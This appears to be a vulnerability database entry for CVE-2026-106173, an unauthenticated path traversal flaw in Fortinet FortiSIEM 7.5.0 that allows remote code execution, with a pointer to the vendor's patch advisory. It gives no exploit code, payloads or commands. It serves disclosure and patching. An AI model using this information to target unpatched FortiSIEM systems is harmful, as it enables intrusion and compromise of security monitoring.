CVE-2026-106173

CRITICAL POC Pub 13/10 Upd 21/10

Overview

This vulnerability is a path traversal flaw caused by insufficient validation of file path inputs within Fortinet FortiSIEM version 7.5.0. The affected component improperly restricts pathname resolution, allowing crafted packets to reference files outside the intended directory scope. This lack of proper boundary enforcement in the file system access mechanism enables unauthorized interaction with restricted directories.

Vulnerability Description

A improper limitation of a pathname to a restricted directory ('path traversal') vulnerability in Fortinet FortiSIEM 7.5.0 may allow attacker to execute unauthorized code or commands via specially crafted packets.

Impact

An unauthenticated attacker can exploit this vulnerability remotely by sending crafted packets to the FortiSIEM system, enabling execution of arbitrary code or commands with the privileges of the affected service. This can result in full system compromise, unauthorized access to sensitive data, and disruption of security monitoring operations. The absence of authentication or user interaction requirements significantly elevates the threat, allowing attackers to gain control without prior access.

Solution

Fortinet has released an advisory (FG-IR-26-180) addressing this issue and recommends upgrading FortiSIEM to a patched version beyond 7.5.0. Administrators should apply the vendor-provided update as detailed in the Fortinet PSIRT advisory at https://fortiguard.fortinet.com/psirt/FG-IR-26-180. No specific workarounds are noted; timely patching is the primary mitigation step.
